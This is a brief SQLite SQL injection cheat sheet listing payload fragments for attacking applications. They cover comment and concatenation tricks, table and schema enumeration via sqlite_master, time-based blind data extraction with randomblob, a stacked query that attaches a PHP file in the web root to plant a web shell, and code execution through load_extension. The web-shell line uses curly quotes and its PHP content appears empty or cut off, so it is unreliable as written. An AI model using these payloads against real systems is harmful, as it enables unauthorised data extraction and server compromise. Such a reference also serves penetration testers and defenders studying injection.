SQLite SQL Injection Cheat Sheet

If you need to use Concatenation || Comments -- Conditionals CASE WHEN key='value1' THEN 'something' WHEN key='value2' THEN 'somethingelse' Substring: substr(string, start, stop) Length: length(string) Quotes without literal quotes: cast(X'27' as text) -- use X'22' for double quotes Table name enumeration: SELECT name FROM sqlite_master WHERE type='table' Table schema enumeration: SELECT sql FROM sqlite_master WHERE type='table' Time-based data extraction: cond='true' AND 1=randomblob(100000000) -- causes a time delay if cond='true' File writing: 1'; ATTACH DATABASE ‘/var/www/lol.php’ AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES (‘’;-- -- requires either direct database access or (non-default) stacked query option enabled Arbitrary Code Execution: load_extension(library_file, entry_point) -- .dll for Windows, .so for 'nix. This requires a non-default configuration.